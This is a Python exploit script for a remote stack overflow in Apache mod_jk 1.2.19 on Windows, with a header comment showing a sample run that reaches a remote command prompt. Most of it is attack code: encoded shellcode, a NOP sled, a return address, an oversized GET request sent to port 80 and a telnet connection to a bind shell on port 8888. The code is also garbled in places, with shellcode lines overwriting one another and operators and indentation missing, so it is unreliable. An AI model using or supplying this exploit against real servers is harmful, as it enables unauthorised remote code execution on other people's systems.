#!/usr/bin/python
#
# _____ _ _ _____ _____ _____ _____
# / ___| |_| | _ \\| _ | _ |_ _|
# | (___| _ | [_)_/| (_) | (_) | | |
# \\_____|_| |_|_| |_||_____|_____| |_|
# C. H. R. O. O. T. SECURITY GROUP
# – — —– — — — —- — — –
# http://www.chroot.org
#
# _ _ _ _____ ____ ____ __ _
# Hacks In Taiwan | |_| | |_ _| __| | \\| |
# Conference 2008 | _ | | | | | (__| () | |
# |_| |_|_| |_| \\____|____|_|\\__|
# http://www.hitcon.org
#
#
# Title =======:: Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit
#
# Author ======:: unohope [at] chroot [dot] org
#
# IRC =========:: irc.chroot.org #chroot
#
# ScriptName ==:: Apache Module mod_jk/1.2.19
#
# Vendor ======:: http://tomcat.apache.org/
#
# Download ====:: http://archive.apache.org/dist/tomcat/tomcat-connectors/jk/binaries/win32/
#
# Tested on ===:: Apache/2.0.58 (Win32) mod_jk/1.2.19
# Apache/2.0.59 (Win32) mod_jk/1.2.19
#
# Greets ======:: zha0
#
#
# [root@wargame tmp]# ./apx-jk_mod-1.2.19
# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
# usage: ./apx-jk_mod-1.2.19 <host>
#
# [root@wargame tmp]# ./apx-jk_mod-1.2.19 192.168.1.78
# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
# [ ] connecting to 192.168.1.78 …
#
# Trying 192.168.1.78…
# Connected to 192.168.1.78.
# Escape character is \’^]\’.
# Microsoft Windows XP [.. 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\\AppServ\\Apache2>
#
#
import os, sys, time
from socket import *
shellcode = "\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49"
shellcode = "\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x49\\x51\\x5a\\x6a\\x68"
shellcode = "\\x58\\x30\\x41\\x31\\x50\\x42\\x41\\x6b\\x42\\x41\\x78\\x42\\x32\\x42\\x41\\x32"
shellcode = "\\x41\\x41\\x30\\x41\\x41\\x58\\x38\\x42\\x42\\x50\\x75\\x4b\\x59\\x49\\x6c\\x43"
shellcode = "\\x5a\\x7a\\x4b\\x32\\x6d\\x5a\\x48\\x5a\\x59\\x69\\x6f\\x4b\\x4f\\x39\\x6f\\x71"
shellcode = "\\x70\\x6e\\x6b\\x62\\x4c\\x44\\x64\\x71\\x34\\x4c\\x4b\\x62\\x65\\x75\\x6c\\x4c"
shellcode = "\\x4b\\x63\\x4c\\x76\\x65\\x70\\x78\\x35\\x51\\x48\\x6f\\x6c\\x4b\\x50\\x4f\\x74"
shellcode = "\\x58\\x6e\\x6b\\x33\\x6f\\x55\\x70\\x37\\x71\\x48\\x6b\\x57\\x39\\x6c\\x4b\\x66"
shellcode = "\\x54\\x6e\\x6b\\x46\\x61\\x7a\\x4e\\x47\\x41\\x6b\\x70\\x7a\\x39\\x4c\\x6c\\x4c"
shellcode = "\\x44\\x6f\\x30\\x62\\x54\\x44\\x47\\x38\\x41\\x4b\\x7a\\x54\\x4d\\x44\\x41\\x4b"
shellcode = "\\x72\\x78\\x6b\\x39\\x64\\x35\\x6b\\x53\\x64\\x75\\x74\\x46\\x48\\x72\\x55\\x79"
shellcode = "\\x75\\x6c\\x4b\\x53\\x6f\\x76\\x44\\x44\\x41\\x48\\x6b\\x35\\x36\\x4e\\x6b\\x54"
shellcode = "\\x4c\\x30\\x4b\\x6c\\x4b\\x51\\x4f\\x65\\x4c\\x65\\x51\\x38\\x6b\\x77\\x73\\x36"
shellcode = "\\x4c\\x4e\\x6b\\x6e\\x69\\x30\\x6c\\x66\\x44\\x45\\x4c\\x30\\x61\\x69\\x53\\x30"
shellcode = "\\x31\\x79\\x4b\\x43\\x54\\x6c\\x4b\\x63\\x73\\x44\\x70\\x4e\\x6b\\x77\\x30\\x66"
shellcode = "\\x6c\\x6c\\x4b\\x72\\x50\\x45\\x4c\\x4c\\x6d\\x4e\\x6b\\x73\\x70\\x64\\x48\\x73"
shellcode = "\\x6e\\x55\\x38\\x6e\\x6e\\x32\\x6e\\x34\\x4e\\x58\\x6c\\x62\\x70\\x39\\x6f\\x6b"
shellcode = "\\x66\\x70\\x66\\x61\\x43\\x52\\x46\\x71\\x78\\x30\\x33\\x55\\x62\\x63\\x58\\x63"
shellcode = "\\x47\\x34\\x33\\x65\\x62\\x41\\x4f\\x30\\x54\\x39\\x6f\\x4a\\x70\\x52\\x48\\x5a"
shellcode = "\\x6b\\x38\\x6d\\x6b\\x4c\\x75\\x6b\\x30\\x50\\x6b\\x4f\\x6e\\x36\\x53\\x6f\\x6f"
shellcode = "\\x79\\x4a\\x45\\x32\\x46\\x6f\\x71\\x6a\\x4d\\x34\\x48\\x77\\x72\\x73\\x65\\x73"
shellcode = "\\x5a\\x37\\x72\\x69\\x6f\\x58\\x50\\x52\\x48\\x4e\\x39\\x76\\x69\\x4a\\x55\\x4c"
shellcode = "\\x6d\\x32\\x77\\x69\\x6f\\x59\\x46\\x50\\x53\\x43\\x63\\x41\\x43\\x70\\x53\\x70"
shellcode = "\\x53\\x43\\x73\\x50\\x53\\x62\\x63\\x70\\x53\\x79\\x6f\\x6a\\x70\\x35\\x36\\x61"
shellcode = "\\x78\\x71\\x32\\x78\\x38\\x71\\x76\\x30\\x53\\x4b\\x39\\x69\\x71\\x4d\\x45\\x33"
shellcode = "\\x58\\x6c\\x64\\x47\\x6a\\x74\\x30\\x5a\\x67\\x43\\x67\\x79\\x6f\\x39\\x46\\x32"
shellcode = "\\x4a\\x56\\x70\\x66\\x31\\x76\\x35\\x59\\x6f\\x58\\x50\\x32\\x48\\x4d\\x74\\x4e"
shellcode = "\\x4d\\x66\\x4e\\x7a\\x49\\x50\\x57\\x6b\\x4f\\x6e\\x36\\x46\\x33\\x56\\x35\\x39"
shellcode = "\\x6f\\x78\\x50\\x33\\x58\\x6b\\x55\\x51\\x59\\x4e\\x66\\x50\\x49\\x51\\x47\\x39"
shellcode = "\\x6f\\x48\\x56\\x32\\x70\\x32\\x74\\x62\\x74\\x46\\x35\\x4b\\x4f\\x38\\x50\\x6e"
shellcode = "\\x73\\x55\\x38\\x4d\\x37\\x71\\x69\\x69\\x56\\x71\\x69\\x61\\x47\\x6b\\x4f\\x6e"
shellcode = "\\x36\\x36\\x35\\x79\\x6f\\x6a\\x70\\x55\\x36\\x31\\x7a\\x71\\x74\\x32\\x46\\x51"
shellcode = "\\x78\\x52\\x43\\x70\\x6d\\x4f\\x79\\x4d\\x35\\x72\\x4a\\x66\\x30\\x42\\x79\\x64"
shellcode = "\\x69\\x7a\\x6c\\x4b\\x39\\x48\\x67\\x62\\x4a\\x57\\x34\\x4f\\x79\\x6d\\x32\\x37"
shellcode = "\\x41\\x6b\\x70\\x7a\\x53\\x6e\\x4a\\x69\\x6e\\x32\\x62\\x46\\x4d\\x6b\\x4e\\x70"
shellcode = "\\x42\\x44\\x6c\\x4c\\x53\\x6e\\x6d\\x31\\x6a\\x64\\x78\\x4c\\x6b\\x4e\\x4b\\x4e"
shellcode = "\\x4b\\x43\\x58\\x70\\x72\\x69\\x6e\\x6d\\x63\\x37\\x66\\x79\\x6f\\x63\\x45\\x73"
shellcode = "\\x74\\x4b\\x4f\\x7a\\x76\\x63\\x6b\\x31\\x47\\x72\\x72\\x41\\x41\\x50\\x51\\x61"
shellcode = "\\x41\\x70\\x6a\\x63\\x31\\x41\\x41\\x46\\x31\\x71\\x45\\x51\\x41\\x4b\\x4f\\x78"
shellcode = "\\x50\\x52\\x48\\x4c\\x6d\\x79\\x49\\x54\\x45\\x38\\x4e\\x53\\x63\\x6b\\x4f\\x6e"
shellcode = "\\x36\\x30\\x6a\\x49\\x6f\\x6b\\x4f\\x70\\x37\\x4b\\x4f\\x4e\\x30\\x4e\\x6b\\x30"
shellcode = "\\x57\\x69\\x6c\\x6b\\x33\\x4b\\x74\\x62\\x44\\x79\\x6f\\x6b\\x66\\x66\\x32\\x6b"
shellcode = "\\x4f\\x4e\\x30\\x53\\x58\\x58\\x70\\x4e\\x6a\\x55\\x54\\x41\\x4f\\x52\\x73\\x4b"
shellcode = "\\x4f\\x69\\x46\\x4b\\x4f\\x6e\\x30\\x68";
foo_base = 8
buf_base = 4087
buf_offset = foo_base * 11
nop = "\\x90"
ret = "\\xcc\\x2a\\xd9\\x77"
buf = nop*foo_base shellcode nop*(buf_base – foo_base – len(shellcode) – buf_offset) ret
buf = "\\x90\\x90\\xb0\\x53\\x6b\\xC0\\x28\\x03\\xd8\\xff\\xd3" nop*(buf_offset – foo_base – 3)
def usage():
print \’usage: %s <host>\\n\’ % sys.argv[0]
sys.exit(-1)
def xpl():
try:
print len(buf)
sockaddr = (host, 80)
s = socket(AF_INET, SOCK_STREAM)
s.connect(sockaddr)
payload = buf \’HTTP/1.0\\r\\nHost: %s\\r\\n\\r\\n\\0\’ % host
s.send(\’GET /\’ payload)
s.close()
print \’ [ ] connecting to %s …\\n\’ % host
time.sleep(3)
os.system("telnet %s 8888" % host)
except:
print \’ [-] EXPLOIT FAILED!\\n\’
if __name__ == \’__main__\’:
print \’Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope [at] chroot.org)\\n\’
try:
host = sys.argv[1]
except IndexError:
usage()
xpl()
# [NOTE]
#
# !! This is just for educational purposes, DO NOT use for illegal. !!
#